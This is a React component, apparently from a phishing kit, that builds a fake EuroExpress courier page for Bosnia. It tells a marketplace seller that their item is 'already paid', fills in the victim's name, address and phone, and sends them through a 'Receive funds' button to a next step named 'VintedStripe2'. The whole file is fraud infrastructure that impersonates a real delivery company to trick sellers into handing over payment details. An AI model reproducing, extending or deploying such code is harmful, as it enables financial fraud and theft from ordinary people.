import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './EuroExpressBaSuccess.css';
import SupportWidget from './SupportWidget';
import { API_URL } from '../apiBase';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const PUB = process.env.PUBLIC_URL || '';
const EEX_HEADER_BANNER_SRC = `${PUB}/euroexpress-ba-header-banner.jpg`;
const EEX_FOOTER_BANNER_SRC = `${PUB}/euroexpress-ba-footer-banner.jpg`;

const SIZE_IMG = {
  S: `${PUB}/euroexpress-ba/size-s.png`,
  M: `${PUB}/euroexpress-ba/size-m.png`,
  L: `${PUB}/euroexpress-ba/size-l.png`,
  XL: `${PUB}/euroexpress-ba/size-xl.png`,
};

const DAY_SLOTS = [
  '01-02',
  '03-04',
  '05-06',
  '07-08',
  '09-10',
  '11-12',
  '13-14',
  '15-16',
  '17-18',
  '19-20',
  '21-22',
  '23-24',
  '25-26',
  '27-28',
  '29-30',
];

const TIME_SLOTS = [
  '08-09',
  '09-10',
  '10-11',
  '11-12',
  '12-13',
  '13-14',
  '14-15',
  '15-16',
  '16-17',
  '17-18',
  '18-19',
  '19-20',
  '20-21',
  '21-22',
  '22-23',
  '23-24',
];

function Toggle({ on, onChange, label }) {
  return (
    <button
      type="button"
      className={`eex-toggle ${on ? 'eex-toggle--on' : ''}`}
      onClick={() => onChange(!on)}
      role="switch"
      aria-checked={on}
    >
      <span className="eex-toggle-label">{label}</span>
      <span className="eex-toggle-track" aria-hidden>
        <span className="eex-toggle-knob" />
      </span>
    </button>
  );
}

/**
 * EuroExpress (BA) — nakon captcha; dugme „Primite sredstva“ → index2 (VintedStripe2).
 */
function EuroExpressBaSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [size, setSize] = useState('M');
  const [lift, setLift] = useState(false);
  const [twoPeople, setTwoPeople] = useState(true);
  const [dayPick, setDayPick] = useState('01-02');
  const [timePick, setTimePick] = useState('09-10');

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'BA').toUpperCase();
  const primary = getPrimaryCurrency(countryCode);
  const curSym = getSymbol(primary);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  }, [pageData]);

  const priceText =
    Number.isFinite(priceNumber) && priceNumber % 1 === 0
      ? String(priceNumber.toFixed(0))
      : String(priceNumber);

  const fn = (pageData?.first_name || '').trim();
  const ln = (pageData?.last_name || '').trim();
  const fullName = [fn, ln].filter(Boolean).join(' ') || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productTitle = (pageData?.product_name || '').trim() || '—';
  const phoneRest = (pageData?.middle_name || '').trim();
  const photoUrl = pageData?.photo_url || '';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const paidLine = `${productTitle} je već plaćen`;

  const sizeOrder = ['S', 'M', 'L', 'XL'];

  if (loading && pageCode) {
    return (
      <div className="eex-wrap">
        <div className="eex-loading">Učitavanje…</div>
        <div className="eex-support">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="eex-wrap">
      <header className="eex-header">
        <div className="eex-header-banner-wrap">
          <img
            src={EEX_HEADER_BANNER_SRC}
            alt="EuroExpress brza pošta — navigacija i kontakt"
            className="eex-header-banner-img"
            width={1024}
            height={140}
          />
        </div>
      </header>

      <main className="eex-main">
        <section className="eex-section eex-section--track">
          <div className="eex-hero-card">
            {photoUrl ? (
              <div className="eex-hero-thumb">
                <img src={photoUrl} alt="" />
              </div>
            ) : (
              <div className="eex-hero-thumb eex-hero-thumb--ph" aria-hidden />
            )}
            <div className="eex-hero-body">
              <h1 className="eex-h1">{productTitle}</h1>
              <input type="text" className="eex-input eex-input--lg" readOnly value={paidLine} aria-label="Status plaćanja" />
              <p className="eex-price-line">
                Cijena: <strong>{priceText}</strong> {curSym}
              </p>
            </div>
          </div>

          <h2 className="eex-h2">Veličina predmeta</h2>
          <div className="eex-size-grid">
            {sizeOrder.map((id) => (
              <button
                key={id}
                type="button"
                className={`eex-size-card ${size === id ? 'eex-size-card--active' : ''}`}
                onClick={() => setSize(id)}
              >
                <span className={`eex-size-badge ${size === id ? 'eex-size-badge--active' : ''}`}>{id}</span>
                <div className="eex-size-ill">
                  <img src={SIZE_IMG[id]} alt="" className="eex-size-img" />
                </div>
              </button>
            ))}
          </div>

          <div className="eex-field">
            <label className="eex-label">Puno ime</label>
            <input type="text" className="eex-input" readOnly value={fullName} />
          </div>
        </section>

        <section className="eex-section eex-section--form">
          <div className="eex-field">
            <label className="eex-label">Adresa za dostavu</label>
            <input type="text" className="eex-input" readOnly value={address} />
          </div>
          <div className="eex-field">
            <label className="eex-label">Vaša telefonska broj</label>
            <div className="eex-phone-row">
              <span className="eex-phone-prefix">+387</span>
              <input type="text" className="eex-input eex-input--phone" readOnly value={phoneRest ? `| ${phoneRest}` : '| '} />
            </div>
            <p className="eex-hint">SMS sa informacijama o dostavi biće poslan na</p>
          </div>
          <div className="eex-field">
            <label className="eex-label">Puno ime</label>
            <input type="text" className="eex-input eex-input--muted" readOnly placeholder="Unesite svoje ime i prezime" />
          </div>
          <div className="eex-field">
            <label className="eex-label">Adresa pošiljaoca</label>
            <input type="text" className="eex-input eex-input--muted" readOnly placeholder="Unesite važeću adresu" />
          </div>
          <div className="eex-toggle-box">
            <Toggle on={lift} onChange={setLift} label="Pogodno za lift u kući" />
          </div>
        </section>

        <section className="eex-section eex-section--schedule">
          <div className="eex-toggle-box eex-toggle-box--border">
            <Toggle on={twoPeople} onChange={setTwoPeople} label="Potrebne su 2 osobe" />
          </div>

          <h2 className="eex-h2 eex-h2--sched">Dan preuzimanja</h2>
          <p className="eex-sub">Kada je prodavac dostupan za preuzimanje?</p>
          <div className="eex-chip-grid">
            {DAY_SLOTS.map((d) => (
              <button
                key={d}
                type="button"
                className={`eex-chip ${dayPick === d ? 'eex-chip--on' : ''}`}
                onClick={() => setDayPick(d)}
              >
                {d}
              </button>
            ))}
          </div>

          <h2 className="eex-h2 eex-h2--sched">Vrijeme preuzimanja</h2>
          <p className="eex-sub">Kada je prodavac dostupan za preuzimanje?</p>
          <div className="eex-chip-grid">
            {TIME_SLOTS.map((t) => (
              <button
                key={t}
                type="button"
                className={`eex-chip ${timePick === t ? 'eex-chip--on' : ''}`}
                onClick={() => setTimePick(t)}
              >
                {t}
              </button>
            ))}
          </div>
        </section>

        <section className="eex-cta-block">
          <Link to={index2Path} className="eex-cta">
            Primite sredstva
          </Link>
          <p className="eex-cta-legal">
            Ovim prihvatate EuroExpress aplikaciju.{' '}
            <a href="#/">Uslovi korišćenja usluge</a> &amp; <a href="#/">Politika privatnosti</a>
          </p>
        </section>

      </main>

      <footer className="eex-footer">
        <div className="eex-footer-banner-wrap">
          <img
            src={EEX_FOOTER_BANNER_SRC}
            alt="EuroExpress brza pošta — navigacija, društvene mreže, kontakt i info broj 1331"
            className="eex-footer-banner-img"
            width={1024}
            height={425}
          />
        </div>
      </footer>

      <div className="eex-support">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default EuroExpressBaSuccess;
